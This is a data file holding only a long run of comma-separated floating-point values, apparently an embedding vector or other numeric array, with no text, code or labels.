-0.01181503850966692, 0.02295278199017048, -0.016827022656798363, -0.04015607759356499, -0.0008851871825754642, 0.02095099724829197, 0.005602736491709948, -0.010731365531682968, 0.057073406875133514, 0.021854057908058167, -0.03828975558280945, 0.022787220776081085, -0.033082105219364166, 0.01794079691171646, -0.04900607094168663, 0.02773900143802166, 0.01283098105341196, -0.010023968294262886, -0.029153794050216675, -0.06911420822143555, -0.020710181444883347, -0.033804554492235184, -0.009835830889642239, 0.016811972483992577, 0.042624443769454956, 0.018934162333607674, 0.03482802212238312, 0.02269691415131092, -0.026549970731139183, -0.01773008331656456, -0.05611014366149902, -0.03178771957755089, -0.02441272884607315, -0.029725732281804085, 0.004285773262381554, -0.014087739400565624, -0.0021372425835579634, 0.013576005585491657, 0.019295386970043182, -0.022546404972672462, 0.005749483592808247, 0.13401414453983307, 0.007284685969352722, -0.007939404807984829, -0.0004726955958176404, -0.011288252659142017, -0.0011466983705759048, 0.003354492597281933, 0.014471540227532387, -0.03868107870221138, -0.03618261218070984, -0.03868107870221138, -0.009068230167031288, -0.02048441581428051, -0.0028559279162436724, 0.01383187249302864, -0.018572939559817314, 0.05294943228363991, 0.0012915643164888024, 0.003939600195735693, -0.003303695470094681, -0.0001648555335123092, -0.04485199227929115, -0.021402528509497643, 0.00567422853782773, -0.02144768089056015, -0.03636322543025017, -0.011521543376147747, -0.01454679574817419, 0.02337420918047428, 0.024999717250466347, 0.006404202431440353, -0.06447850167751312, -0.0185879897326231, 0.02763364277780056, 0.006900885608047247, -0.02412675879895687, -0.008752158842980862, -0.013523327186703682, 0.016526002436876297, -0.0022388368379324675, 0.010475498624145985, -0.012206364423036575, -0.00888009276241064, 0.013237358070909977, 0.011935446411371231, 0.03512904420495033, 0.01637549325823784, 0.004455097019672394, 0.02823568321764469, 0.01941579580307007, -0.015622942708432674, 0.0076233334839344025, -0.02198951691389084, 0.02469869703054428, -0.02888287603855133, -0.0024307372514158487, -0.00731102516874671, 0.02548135071992874, 0.014840289950370789, 0.01256758812814951, 0.017880592495203018, -0.011152793653309345, -0.002886030124500394, 0.012846032157540321, 0.010219631716609001, -0.05394279956817627, -0.014486591331660748, 0.026248950511217117, 0.034767817705869675, -0.04021628201007843, -0.01192039530724287, 0.0076120453886687756, 0.008571546524763107, 0.012650368735194206, -0.002061987528577447, 0.028446396812796593, -0.01819666475057602, 0.03627292066812515, -0.05827748775482178, 0.0367545522749424, -0.004684625193476677, 0.006897122599184513, 0.015239141881465912, -0.007089023012667894, -0.012665419839322567, 0.04271474853157997, -0.017037736251950264, -0.04190199449658394, -0.030628792941570282, -0.018437480553984642, 0.023103291168808937, -0.007228244561702013, -0.00018084721523337066, -0.012733149342238903, 0.005715618841350079, -0.007548078428953886, 0.006464406382292509, -0.013523327186703682, 0.036513734608888626, 0.018919112160801888, -0.0210262518376112, -0.019972681999206543, -0.01855788752436638, 0.02284742332994938, 0.027197163552045822, -0.0053619202226400375, -0.0005093824001960456, -0.023118343204259872, 0.024533135816454887, -0.008052287623286247, 0.006788002792745829, 0.02856680564582348, -0.002349837915971875, -0.002030004281550646, -0.014411336742341518, -0.0394035279750824, 0.0073034996166825294, 0.02090584486722946, 0.011634426191449165, -0.0036103595048189163, -0.01034756563603878, 0.02217012830078602, 0.023028036579489708, -0.017895644530653954, 0.0031607109121978283, 0.01773008331656456, 0.004917915444821119, 0.009941188618540764, -0.02217012830078602, 0.02147778309881687, 0.01637549325823784, -0.005523718427866697, 0.022787220776081085, -0.039584141224622726, -0.0005136154941283166, 0.028295887634158134, 0.059933099895715714, -0.026068339124321938, 0.002334787044674158, -0.015156361274421215, 0.004383604973554611, -0.002735520014539361, -0.005963960196822882, 0.010618483647704124, -0.0002341136714676395, 0.011559171602129936, -0.015833655372262, 0.049457598477602005, 0.008165169507265091, -0.02217012830078602, -0.025436196476221085, 0.030749201774597168, -0.007574417628347874, -0.009587489999830723, -0.005429649725556374, 0.004379841964691877, -0.027588490396738052, -0.009482132270932198, 0.0068933600559830666, -0.024006351828575134, -0.00369502161629498, 0.014644626528024673, -0.008360832929611206, -0.027031604200601578, -0.027227265760302544, -0.029515018686652184, 0.0039697024039924145, 0.03949383646249771, 0.028040019795298576, -0.010287361219525337, 0.0018569176318123937, -0.016315288841724396, 0.0020751571282744408, -0.011197946965694427, 0.006106944754719734, 0.02012319304049015, 0.005030798260122538, 0.018166562542319298, -0.024713749065995216, -0.0428953617811203, 0.0002979628334287554, 0.024066556245088577, 0.03260047361254692, -0.04632699117064476, 0.012642843648791313, -0.0023761773481965065, 0.011130217462778091, -0.010949605144560337, 0.02794971503317356, 0.008285577408969402, 0.0006782358977943659, -0.01544233039021492, -0.021748701110482216, 0.02953007072210312, 0.005922569893300533, -0.028551755473017693, 0.018422428518533707, -0.03275098651647568, 0.005185070913285017, -0.003710072487592697, 0.008217847906053066, 0.049457598477602005, -0.03038797713816166, -0.005775822792202234, 0.01147639099508524, -0.02194436453282833, -0.01894921436905861, 0.006712747737765312, -0.045062705874443054, -0.020966049283742905, 0.010249733924865723, -0.04723004996776581, -0.001309437328018248, -0.051384128630161285, -0.0020864454563707113, 0.0026565021835267544, -0.017715031281113625, -0.012748200446367264, 0.029213998466730118, -0.0813356265425682, 0.026218848302960396, 0.01099475845694542, -0.0066976966336369514, 0.021899210289120674, -0.01679692044854164, 0.02466859482228756, -0.014117841608822346, -0.028461448848247528, -0.0030986254569143057, 0.02630915492773056, 0.008112491108477116, -0.011340931989252567, 0.025466298684477806, -0.0022689388133585453, -0.007630859035998583, -0.01102486066520214, 0.01572829857468605, -0.0070062424056231976, 0.010317463427782059, 0.012620266526937485, 0.0018221121281385422, 0.0009707897552289069, 0.0215530376881361, 0.02284742332994938, -0.007627096492797136, 0.025120126083493233, -0.031938232481479645, -0.0189040619879961, -0.032871391624212265, 0.025586707517504692, -0.02680583856999874, 0.015088631771504879, -0.0347377173602581, -0.017037736251950264, -0.002364889020100236, 0.0047674053348600864, 0.0041503142565488815, -0.005117341410368681, 0.00573819549754262, -0.015096156857907772, -0.015592840500175953, -0.007811471354216337, 0.04801270365715027, -0.026971399784088135, 0.017143093049526215, -0.01580355502665043, -0.021763751283288002, 0.015562738291919231, 0.02469869703054428, -0.015359549783170223, 0.015683146193623543, -0.012319247238337994, 0.015562738291919231, 0.028115276247262955, -0.05451473593711853, 0.012868608348071575, 0.028536703437566757, -0.051203515380620956, 0.06303360313177109, -0.03988515958189964, -0.01773008331656456, -0.012183788232505322, 0.022546404972672462, -0.037446897476911545, -0.05924075096845627, 0.021793853491544724, 0.015863757580518723, -0.01658620685338974, 0.013448072597384453, 0.025315789505839348, -0.027874460443854332, 0.03248006850481033, 0.00328488158993423, 0.02877751924097538, 0.009933662600815296, 0.0025266872253268957, 0.04753107205033302, 0.004951780196279287, -0.028973182663321495, 0.03886169195175171, 0.003335678717121482, 0.03681475669145584, -0.009391826577484608, -0.01851273514330387, 0.008752158842980862, 0.03874128311872482, 0.03241986408829689, -0.004590556025505066, -0.0027618592139333487, -0.03521934896707535, 0.04133005812764168, -0.013192204758524895, -0.0018578582676127553, 0.007766318041831255, 0.00303842150606215, 0.03642342984676361, 0.02680583856999874, -0.013380343094468117, 0.0006264980183914304, -0.0006801172276027501, -0.0318780280649662, -0.010791569948196411, -0.019491050392389297, -0.007397568318992853, 0.00027703255182132125, 0.007555603981018066, -0.03260047361254692, -0.016932379454374313, -0.044550973922014236, -0.015743350610136986, -0.004526589531451464, -0.018994366750121117, 0.03567088022828102, -0.028009919449687004, 0.0025041108019649982, 0.027603542432188988, -0.04142036288976669, -0.02641451172530651, -0.024397676810622215, 0.022079823538661003, -0.010377666912972927, -0.014140418730676174, 0.03455710411071777, 0.0199124775826931, -0.0068594953045248985, 0.00988098420202732, -0.009730474092066288, 0.01809130609035492, 0.01715814508497715, 0.034797921776771545, 0.005316767375916243, -0.0035256976261734962, 0.014185571111738682, 0.018467582762241364, -0.00033582551986910403, 0.0022896339651197195, 0.022546404972672462, -0.01099475845694542, 0.006784240249544382, -0.007818996906280518, 0.0032096265349537134, 0.007766318041831255, 0.0014637100975960493, 0.02105635404586792, -0.016887227073311806, -0.02230558730661869, 0.020499467849731445, -0.015683146193623543, -0.016721665859222412, -0.00909833237528801, -0.06405707448720932, -0.014042587019503117, -0.018317071720957756, -0.029590273275971413, 0.010964656248688698, -0.0056817540898919106, -0.018362224102020264, -0.018166562542319298, -0.001718636485747993, -0.0105131259188056, 0.013530852273106575, 0.012770776636898518, 0.006566000636667013, -0.01894921436905861, -0.030944865196943283, 0.024472933262586594, 0.0023931097239255905, -0.018031103536486626, -0.013184679672122002, 0.018527785316109657, 0.03338312730193138, 0.006509559229016304, -0.03142649680376053, 0.03425608575344086, 0.012868608348071575, 0.018889009952545166, -0.05066167935729027, -0.030794354155659676, 0.019355591386556625, -0.025571655482053757, -0.028220633044838905, -0.010949605144560337, -0.028732366859912872, -0.01077651884406805, -0.023569872602820396, -0.0343162901699543, -0.018106358125805855, 0.015668096020817757, -0.010942080058157444, 0.0076120453886687756, 0.018542837351560593, -0.011310829780995846, -0.019867325201630592, -0.0030910999048501253, 0.027212215587496758, 0.026911195367574692, 0.010483024641871452, 0.0269563477486372, -0.00827805232256651, 0.022862475365400314, -0.021899210289120674, 0.004297061823308468, -0.010535703040659428, -0.007916827686131, 0.03702547028660774, -0.013056745752692223, -0.0065057966858148575, -0.014667203649878502, 0.012424604035913944, 0.005034560803323984, -0.012003175914287567, 0.0010460447520017624, 0.06020401790738106, -0.027513235807418823, -0.00830815453082323, -0.05303973704576492, 0.038410160690546036, 0.002199328038841486, 0.04060760885477066, -0.010377666912972927, 0.003100506728515029, 0.01776018552482128, -0.01045292243361473, 0.006182199809700251, 0.010054070502519608, 0.00018484515021555126, 0.02817547880113125, -0.017037736251950264, 0.018001001328229904, 0.01712804287672043, 0.011792461387813091, -0.024503035470843315, -0.0013357766438275576, -0.004560454282909632, -0.019867325201630592, -0.003924549091607332, 0.013380343094468117, 0.010731365531682968, 0.011807512491941452, -0.020394111052155495, -0.0006989309913478792, 0.011679579503834248, -0.006024164613336325, 0.025541553273797035, -0.03335302323102951, -0.014080214314162731, 0.015848707407712936, -0.013214781880378723, 0.008759683929383755, 0.0014477184740826488, -0.0367545522749424, 0.047350458800792694, -0.02680583856999874, -0.00573819549754262, 0.020002784207463264, 0.02599308453500271, -0.0052603259682655334, -0.004473911132663488, -0.013132001273334026, 0.006163386162370443, -0.02040916122496128, 0.004285773262381554, 0.008646802045404911, -0.00861669983714819, -0.01340291928499937, -0.0026226374320685863, -0.02027370221912861, 0.015607891604304314, -0.005399547517299652, 0.016390543431043625, -0.003188931383192539, -0.019024468958377838, 0.03130608797073364, -0.0035501555539667606, -0.036303021013736725, -0.030613742768764496, 0.02048441581428051, 0.031215783208608627, 0.012943863868713379, -0.02048441581428051, 0.05755503848195076, 0.013425495475530624, 0.02141757868230343, 0.05285912752151489, -0.004880288150161505, 0.008947822265326977, 0.006016639061272144, 0.029575223103165627, -0.013274985365569592, 0.009948713704943657, 0.005324292927980423, -0.003555799601599574, -0.04789229482412338, 0.012748200446367264, -0.002165463287383318, -0.014132892712950706, 0.02498466707766056, -0.020785436034202576, -0.0015032190131023526, 0.006460643373429775, -0.020634926855564117, -0.024999717250466347, 0.055929530411958694, 0.0062536923214793205, -0.030688997358083725, -0.0459657646715641, 0.01569819636642933, 0.04006577283143997, -0.003557681106030941, -0.011634426191449165, -0.03425608575344086, 0.007901777513325214, -0.017564522102475166, -0.020032886415719986, -0.009068230167031288, -0.024999717250466347, 0.000016094580132630654, 0.009105857461690903, -0.019190030172467232, 0.007566892076283693, 0.008556495420634747, -0.035189248621463776, -0.0004522356321103871, -0.003980990499258041, 0.009602540172636509, 0.02095099724829197, -0.027001501992344856, 0.024156861007213593, 0.06345503032207489, -0.00641549052670598, -0.02209487371146679, -0.00954233668744564, -0.015171412378549576, -0.005132392514497042, 0.025511451065540314, 0.00007460829510819167, -0.003339441493153572, -0.04343719780445099, -0.025105074048042297, -0.007894251495599747, -0.0071191247552633286, 0.0029763360507786274, -0.03603210300207138, 0.0049254409968853, -0.007160515058785677, -0.005324292927980423, -0.023931097239255905, 0.013004067353904247, 0.020288754254579544, -0.012176262214779854, 0.008263001218438148, 0.021327272057533264, -0.01068621315062046, 0.002530450001358986, 0.02641451172530651, -0.014358658343553543, 0.004631946329027414, -0.0007064564852043986, 0.004684625193476677, -0.019867325201630592, -0.034436699002981186, 0.020288754254579544, -0.014877917245030403, 0.021899210289120674, 0.016751768067479134, 0.017925746738910675, -0.03904230520129204, 0.024608392268419266, -0.0032058637589216232, -0.015713248401880264, -0.012800878845155239, 0.005237749312072992, 0.004733540583401918, 0.002449550898745656, -0.011047436855733395, 0.019686713814735413, 0.020499467849731445, -0.012913761660456657, -0.00048727626563049853, 0.0428953617811203, -0.00567422853782773, -0.029966549947857857, 0.013222306966781616, -0.026038236916065216, 0.019114775583148003, 0.009324097074568272, -0.009339148178696632, 0.0029895056504756212, -0.00017532067431602627, -0.008232899010181427, 0.015592840500175953, -0.00995623879134655, -0.007879200391471386, -0.02391604520380497, -0.017007634043693542, 0.0006998716853559017, -0.005832264199852943, 0.00739004323258996, -0.016179829835891724, 0.01572829857468605, 0.007931878790259361, -0.0019086555112153292, -0.02402140200138092, -0.006675120443105698, 0.015254192985594273, -0.026896145194768906, -0.00584355229511857, -0.0055688717402517796, -0.027483133599162102, 0.00345420534722507, 0.006058029364794493, 0.021071406081318855, -0.008947822265326977, -0.0022049720864742994, -0.0341055765748024, -0.009113382548093796, 0.00013381283497437835, 0.02384079061448574, 0.006867020390927792, -0.004646997433155775, 0.018497683107852936, 0.021462731063365936, 0.009835830889642239, 0.009030602872371674, -0.03949383646249771, -0.022681863978505135, -0.014847815968096256, 0.03085455857217312, 0.005764534696936607, 0.014561846852302551, 0.0037157165352255106, -0.007401331327855587, -0.007879200391471386, -0.01043787132948637, 0.02477395348250866, 0.010219631716609001, -0.016104575246572495, 0.02402140200138092, -0.0402463860809803, 0.01453174464404583, 0.005802161991596222, 0.024457881227135658, -0.005376971326768398, -0.017955847084522247, -0.0009764339192770422, 0.0338948629796505, -0.028265785425901413, -0.024713749065995216, 0.03624281659722328, 0.022997934371232986, -0.0022858711890876293, -0.038410160690546036, 0.014027535915374756, -0.04424995183944702, 0.002351719420403242, -0.006042978260666132, -0.012718098238110542, 0.01506605464965105, -0.02334410697221756, 0.00870700553059578, 0.0011466983705759048, -0.004853948950767517, 0.000037068977690069005, 0.055538203567266464, -0.008022185415029526, -0.01544233039021492, -0.034195881336927414, 0.0024269744753837585, -0.0006725917337462306, -0.027648694813251495, -0.02180890552699566, 0.016315288841724396, 0.024653544649481773, -0.03467751294374466, -0.012341823428869247, -0.013056745752692223, -0.002633925760164857, 0.01068621315062046, 0.024262217804789543, -0.03148670122027397, 0.02198951691389084, -0.009075755253434181, -0.0142984539270401, 0.03199843317270279, -0.0009105857461690903, 0.024758901447057724, -0.008338255807757378, -0.01640559360384941, -0.02165839448571205, -0.00019201789109501988, 0.029078539460897446, -0.006633730139583349, 0.027889510616660118, -0.02555660530924797, -0.03549026697874069, 0.02641451172530651, -0.03392496332526207, 0.03031272254884243, 0.025044871494174004, 0.010806621052324772, 0.007834048010408878, -0.01528429426252842, -0.004985644947737455, -0.003059116657823324, -0.0022219044622033834, -0.008767209947109222, 0.03741679713129997, 0.0197017639875412, 0.015863757580518723, -0.017579572275280952, 0.05559840798377991, -0.04765147715806961, 0.0002348191774217412, -0.016887227073311806, -0.03046323172748089, -0.006814341992139816, -0.028551755473017693, -0.008586597628891468, -0.0033488483168184757, 0.007999608293175697, 0.0004905686364509165, 0.03681475669145584, 0.013071796856820583, 0.002722350414842367, 0.027257367968559265, -0.003909498453140259, 0.006216064561158419, 0.003894447349011898, -0.023494618013501167, 0.002265176037326455, -0.010934554040431976, 0.03702547028660774, -0.015111207962036133, -0.038380060344934464, -0.00997128989547491, 0.007235770113766193, -0.009768101386725903, -0.0030459470581263304, -0.03570098057389259, -0.013907128013670444, -0.0064004394225776196, 0.02509002387523651, -0.02313339337706566, 0.0424739345908165, 0.013229832984507084, -0.026760686188936234, -0.0009679676732048392, 0.011461339890956879, 0.012093481607735157, -0.003083574352785945, 0.03181782364845276, 0.002852165373042226, 0.020108141005039215, -0.004955543205142021, 0.0032924071419984102, 0.03302190452814102, -0.03579128906130791, 0.028642060235142708, -0.01340291928499937, -0.03810914233326912, -0.013222306966781616, 0.010851774364709854, 0.006234878674149513, -0.03735659271478653, -0.015788502991199493, 0.03353363648056984, 0.011235574260354042, 0.0034636124037206173, -0.02995149791240692, -0.020634926855564117, -0.03570098057389259, 0.000796762527897954, -0.0051549687050282955, 0.006223590113222599, -0.002163581782951951, -0.03163721039891243, 0.00813506729900837, 0.041059140115976334, 0.016209932044148445, -0.01406516321003437, 0.010370141826570034, 0.03437649458646774, -0.011408661492168903, 0.003838005941361189, -0.03359384089708328, -0.03338312730193138, 0.000805228715762496, -0.030734149739146233, -0.005399547517299652, 0.0031757617834955454, 0.06309381127357483, 0.0024890596978366375, -0.014787611551582813, 0.011604323983192444, 0.02388594299554825, 0.007593231741338968, -0.020394111052155495, -0.014305979013442993, 0.0034353916998952627, 0.0016565511468797922, 0.0299213957041502, 0.0039697024039924145, -0.008752158842980862, 0.0023216174449771643, 0.004007329698652029, 0.02599308453500271, -0.0023968724999576807, -0.015622942708432674, -0.01941579580307007, -0.026429563760757446, -0.036122411489486694, -0.0075104511342942715, 0.018497683107852936, 0.019867325201630592, -0.003008319530636072, 0.010001392103731632, 0.010385192930698395, -0.007871675305068493, -0.01887395977973938, -0.0159390140324831, -0.0013291918439790606, -0.012055854313075542, -0.02817547880113125, -0.01715814508497715, -0.0269563477486372, -0.0396142415702343, 0.026083389297127724, -0.018076255917549133, 0.00013875144941266626, -0.004748591687530279, 0.004026143811643124, 0.02934945747256279, 0.02667037956416607, -0.013448072597384453, -0.019310439005494118, 0.03467751294374466, 0.014787611551582813, -0.049066271632909775, 0.007254583761096001, -0.0037646323908120394, -0.02441272884607315, 0.0030102008022367954, -0.027513235807418823, 0.01915992796421051, 0.0336841456592083, -0.017715031281113625, 0.021974466741085052, -0.006532135885208845, -0.000788296340033412, -0.015622942708432674, -0.0008997678523883224, 0.0017045262502506375, -0.002295278012752533, 0.04081832244992256, -0.02298288233578205, 0.0007139819790609181, 0.0016960600623860955, 0.023464515805244446, 0.020062988623976707, -0.013026644475758076, -0.016917329281568527, 0.01383187249302864, -0.0006133284186944366, 0.023028036579489708, -0.03702547028660774, 0.025180330500006676, 0.0040487200021743774, 0.005832264199852943, -0.0200178362429142, -0.01033251453191042, -0.033292822539806366, -0.018437480553984642, -0.009467081166803837, -0.008661853149533272, 0.014953172765672207, -0.018964264541864395, -0.003830480622127652, -0.010430346243083477, 0.0006965792854316533, -0.044129543006420135, 0.002163581782951951, -0.005873654503375292, 0.008842464536428452, 0.020424213260412216, -0.004910389892756939, -0.0024420253466814756, 0.002585009904578328, -0.0013188442680984735, 0.02019844762980938, 0.027031604200601578, 0.04388872906565666, -0.018648194149136543, -0.00920368917286396, -0.01485534105449915, -0.012432129122316837, 0.00681810500100255, 0.03925301879644394, 0.0032980511896312237, -0.0014467777218669653, 0.01855788752436638, 0.018286969512701035, 0.006946038454771042, 0.005640363786369562, 0.0093993516638875, 0.022832373157143593, -0.019927529618144035, -0.005632838234305382, 0.03543006256222725, -0.01598416641354561, -0.01915992796421051, 0.015397177077829838, 0.03395506367087364, -0.003473019227385521, -0.03684485703706741, 0.005519955884665251, -0.009241316467523575, 0.009948713704943657, 0.010392718017101288, 0.007484111934900284, -0.0016142202075570822, -0.019972681999206543, 0.013884550891816616, 0.008646802045404911, 0.033413227647542953, -0.010626008734107018, 0.016751768067479134, 0.0024081605952233076, -0.004673336632549763, -0.004236857872456312, 0.00829310342669487, 0.015201514586806297, -0.004394893068820238, -0.018994366750121117, 0.005659177433699369, -0.026113491505384445, -0.01962650939822197, -0.014290928840637207, -0.003066641977056861, -0.0061859628185629845, 0.0028578094206750393, 0.018648194149136543, -0.0032660679426044226, 0.01124310027807951, -0.013560954481363297, -0.023599974811077118, 0.03416578099131584, -0.026399461552500725, 0.0008795430767349899, -0.005963960196822882, 0.0028465210925787687, -0.02566196210682392, 0.002765621989965439, -0.015713248401880264, -0.026354307308793068, 0.0459657646715641, -0.047380559146404266, -0.025210432708263397, 0.00664125569164753, -0.02713696099817753, 0.008232899010181427, 0.002265176037326455, -0.010753942653536797, -0.018286969512701035, 0.018994366750121117, -0.03759740665555, -0.026790786534547806, 0.01213863492012024, 0.013613632880151272, 0.09259377419948578, 0.00476364279165864, 0.006851969752460718, -0.011145268566906452, -0.006772951688617468, 0.003476782003417611, -0.003066641977056861, 0.01630023680627346, 0.008932771161198616, -0.011980598792433739, 0.034045372158288956, -0.020288754254579544, -0.024683646857738495, -0.007585706189274788, 0.0149606978520751, 0.028687214478850365, 0.007058920804411173, 0.0016057540196925402, 0.01830202154815197, -0.027889510616660118, 0.014411336742341518, 0.002159819006919861, 0.011807512491941452, -0.01177741028368473, 0.015592840500175953, -0.010242207907140255, -0.016992583870887756, -0.0065848142839968204, -0.026038236916065216, -0.00435350276529789, 0.004921678453683853, 0.01694743148982525, -0.011641951277852058, -0.002748689614236355, 0.009361724369227886, -0.012545011937618256, 0.031215783208608627, 0.0019105367828160524, -0.01225904282182455, -0.019174979999661446, 0.0034654936753213406, -0.01648085005581379, -0.007811471354216337, -0.0022388368379324675, -0.006863257847726345, -0.023900995030999184, 0.03774791955947876, -0.015163886360824108, -0.007228244561702013, -0.021327272057533264, 0.008601648733019829, -0.020183395594358444, 0.007706114090979099, 0.03928311914205551, 0.0043572657741606236, 0.021718598902225494, -0.0031625921837985516, -0.009120908565819263, -0.01397485751658678, -0.01976196840405464, 0.0008249831735156476, 0.029575223103165627, 0.0024890596978366375, -0.008443613536655903, 0.017278552055358887, -0.022350741550326347, -0.05018004775047302, 0.005610261578112841, -0.011002283543348312, -0.012198838405311108, 0.006355286575853825, -0.007600757293403149, 0.0134781738743186, -0.010859299451112747, 0.02284742332994938, 0.00647945748642087, -0.005467277020215988, 0.012981491163372993, -0.030071906745433807, -0.019069621339440346, 0.030824456363916397, 0.01733875647187233, 0.019822172820568085, 0.02280227094888687, -0.02123696729540825, 0.012108532711863518, -0.0053280554711818695, 0.0008696658187545836, -0.015743350610136986, 0.004519063979387283, 0.000007069856565067312, -0.0033657806925475597, 0.008330730721354485, 0.00549737922847271, 0.009391826577484608, 0.02373543381690979, 0.02805507183074951, -0.015893859788775444, -0.009038127958774567, -0.012394501827657223, 0.018723448738455772, 0.004218043759465218, 0.026655327528715134, -0.008082388900220394, 0.014712356962263584, 0.026339257135987282, -0.0035162908025085926, 0.017067838460206985, 0.00977562740445137, -0.001207843073643744, -0.048494335263967514, -0.030643844977021217, -0.008902668952941895, -0.024141810834407806, 0.0018437480321153998, 0.0037213608156889677, 0.025074973702430725, 0.015954064205288887, -0.020710181444883347, -0.0005032679764553905, -0.016676511615514755, -0.02152293547987938, 0.035731084644794464, -0.0037382931914180517, -0.01304922066628933, 0.010407769121229649, -0.019867325201630592, -0.027332622557878494, 0.04196219891309738, 0.03169741481542587, 0.02326885238289833, -0.0056930421851575375, -0.007758792489767075, -0.022456098347902298, 0.01018952950835228, -0.04563464596867561, 0.03028262034058571, 0.022275486961007118, 0.003813548246398568, -0.0031099137850105762, -0.0056140245869755745, 0.03359384089708328, 0.018151510506868362, 0.005027035251259804, 0.011378559283912182, 0.000771363964304328, 0.018437480553984642, 0.02805507183074951, 0.000096420495538041, 0.021793853491544724, 0.002519161906093359, -0.019325489178299904, -0.004195467568933964, 0.028461448848247528, -0.0036987841594964266, 0.0010328751523047686, 0.004978119395673275, -0.018678296357393265, -0.008947822265326977, 0.010317463427782059, 0.007047632709145546, 0.038590773940086365, 0.02308824099600315, 0.009941188618540764, -0.00954233668744564, 0.029605325311422348, -0.02773900143802166, -0.05186576023697853, -0.018783653154969215, -0.019114775583148003, 0.008074863813817501, 0.004564216826111078, -0.03139639273285866, 0.006882071495056152, 0.019536202773451805, 0.029861191287636757, -0.02490941248834133, -0.003251016838476062, 0.021613242104649544, -0.021613242104649544, -0.006475694477558136, 0.01840737834572792, -0.013222306966781616, -0.01869334653019905, 0.01944589801132679, -0.01848263293504715, -0.004176653455942869, 0.0007897073519416153, -0.02137242630124092, 0.03160711005330086, 0.015314396470785141, 0.03139639273285866, -0.02924410067498684, -0.021929312497377396, -0.013651261106133461, -0.020108141005039215, -0.018603041768074036, -0.024728799238801003, -0.0016283305594697595, 0.002665909007191658, 0.008082388900220394, -0.025210432708263397, -0.011077539063990116, 0.008225373923778534, 0.0018362224800512195, -0.03311220929026604, 0.016932379454374313, 0.016149727627635002, -0.01520903967320919, 0.008466189727187157, -0.0028728602919727564, -0.006690171547234058, 0.01684207282960415, -0.0040374319069087505, 0.02885277569293976, 0.009873459115624428, 0.0012699284125119448, -0.03257037326693535, 0.0006490745581686497, 0.007438958622515202, -0.016526002436876297, 0.016029318794608116, 0.017007634043693542, -0.004266959615051746, -0.013327663764357567, 0.017955847084522247, 0.025902777910232544, -0.03002675250172615, -0.016179829835891724, -0.004496487323194742, -0.011626901105046272, 0.005286665167659521, 0.01045292243361473, 0.01233429741114378, -0.014734933152794838, -0.0036028341855853796, 0.021402528509497643, 0.011355982162058353, 0.010829197242856026, -0.01751936785876751, 0.009587489999830723, 0.0024420253466814756, -0.03699536621570587, 0.004786219447851181, -0.0283861942589283, -0.0003174821031279862, 0.008473715744912624, 0.013214781880378723, -0.005930095445364714, 0.032660678029060364, -0.027543338015675545, -0.008564021438360214, -0.025496400892734528, 0.0004515301261562854, -0.008774735033512115, 0.02999665029346943, 0.02080048806965351, 0.005324292927980423, 0.009504709392786026, 0.0010037138126790524, 0.00008830706065054983, -0.014215673319995403, -0.00435350276529789, 0.007803945802152157, -0.0226668119430542, 0.02745303139090538, -0.008812363259494305, -0.01744411326944828, -0.004157839808613062, -0.006528372876346111, 0.001470295013859868, -0.007694825995713472, 0.005948909558355808, -0.0031343717128038406, -0.00011417597852414474, 0.00016085761308204383, 0.0029594036750495434, -0.024322422221302986, -0.0015013376250863075, 0.006197250913828611, -0.010558279231190681, 0.05093259736895561, 0.001453362638130784, -0.010023968294262886, -0.00008383879321627319, -0.018964264541864395, -0.04879535362124443, -0.005230223760008812, 0.009918611496686935, -0.012620266526937485, -0.0022068535909056664, -0.0017477978253737092, -0.024834156036376953, -0.023961197584867477, 0.016179829835891724, -0.002739282790571451, -0.029876243323087692, 0.0398249551653862, -0.016992583870887756, 0.017293604090809822, 0.023148443549871445, 0.01736885868012905, 0.033804554492235184, 0.018572939559817314, -0.0009627939434722066, 0.012635317631065845, -0.0202285498380661, -0.015773452818393707, 0.004349740222096443, -0.01627013459801674, 0.020830590277910233, -0.0197017639875412, -0.012424604035913944, -0.030357874929904938, -0.005331818014383316, 0.008202796801924706, 0.008789786137640476, 0.008089914917945862, -0.009000500664114952, -0.005670465994626284, -0.011062487959861755, -0.01666146144270897, -0.01708289049565792, -0.020529570057988167, -0.007593231741338968, -0.010197055526077747, -0.012785827741026878, 0.0013592938194051385, -0.00046093700802884996, -0.017474215477705002, 0.016811972483992577, 0.011273202486336231, 0.022185180336236954, -0.02370533160865307, -0.0022896339651197195, -0.008345781825482845, 0.009579963982105255, 0.025044871494174004, -0.012936337850987911, 0.0012304196134209633, -0.03356374055147171, 0.04918668046593666, -0.003913260996341705, 0.0030798118095844984, 0.012981491163372993, 0.0013649379834532738, -0.004500250332057476, 0.0042556715197861195, -0.007879200391471386, -0.024728799238801003, -0.029680579900741577, -0.0159390140324831, 0.008473715744912624, -0.005839789751917124, 0.00600535050034523, 0.006468168925493956, 0.004805033095180988, 0.0031155578326433897, -0.00469967583194375, -0.02924410067498684, -0.017775235697627068, 0.003760869614779949, 0.00019331133808009326, 0.002833351492881775, 0.0040712966583669186, 0.0006457821582444012, -0.028325989842414856, 0.018813755363225937, 0.02220023050904274, -0.014200622215867043, 0.002586891409009695, 0.015622942708432674, -0.004944254644215107, 0.013794245198369026, 0.012861083261668682, -0.00022941023053135723, 0.015637993812561035, -0.020258652046322823, -0.03184792399406433, 0.03317241370677948, 0.020454315468668938, 0.004710964392870665, -0.011958022601902485, 0.0028465210925787687, -0.04039689525961876, 0.01962650939822197, -0.010535703040659428, 0.006961089558899403, -0.004955543205142021, -0.010844248346984386, 0.018678296357393265, 0.0018889009952545166, 0.016571154817938805, 0.03407547250390053, 0.0075894687324762344, -0.0071793291717767715, 0.02058977447450161, 0.02552650310099125, -0.022034669294953346, -0.0030816930811852217, 0.014576897025108337, 0.00409387331455946, -0.014072689227759838, 0.02313339337706566, -0.01851273514330387, 0.004007329698652029, -0.02376553602516651, -0.016450747847557068, 0.02799486741423607, 0.005926332902163267, 0.017489267513155937, 0.0016415001591667533, 0.038199447095394135, -0.007803945802152157, -0.003950888756662607, -0.009015551768243313, -0.027889510616660118, -0.005655414890497923, 0.0047674053348600864, 0.02159819006919861, 0.005948909558355808, -0.008037236519157887, -0.0011749189579859376, -0.038229551166296005, 0.012733149342238903, -0.013749091885983944, 0.010595906525850296, -0.01395980641245842, 0.018618091940879822, 0.006490745581686497, -0.003456086851656437, 0.011070013046264648, 0.02030380442738533, -0.003424103371798992, 0.010678687132894993, 0.006528372876346111, -0.023569872602820396, -0.008857515640556812, -0.01544233039021492, -0.014509167522192001, 0.007886726409196854, -0.004180416464805603, -0.00906070414930582, 0.016059421002864838, 0.009467081166803837, -0.015758400782942772, -0.01569819636642933, -0.00007302088488359004, -0.01485534105449915, 0.012913761660456657, 0.01627013459801674, 